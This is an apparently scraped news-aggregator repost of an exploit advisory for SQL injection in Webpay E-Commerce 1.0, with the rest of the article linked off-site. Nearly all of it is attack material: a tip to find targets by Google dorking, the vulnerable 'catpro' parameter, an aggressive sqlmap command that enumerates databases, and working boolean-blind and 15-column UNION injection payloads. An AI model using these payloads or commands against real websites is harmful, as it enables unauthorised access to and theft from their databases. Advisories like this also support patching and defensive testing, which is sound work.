Webpay E-Commerce 1.0 SQL Injection exploit

2 months ago 29
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=PACKETSTORM:181277 ============================================================================================================================================= | # Title : Webpay E-Commerce v1.0 SQL Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : http://webpay.com.np/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : catproduct.php?catpro=6 [+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs [+] Parameter: catpro (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: catpro=6' AND 5853=5853-- KEle Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================
Read Entire Article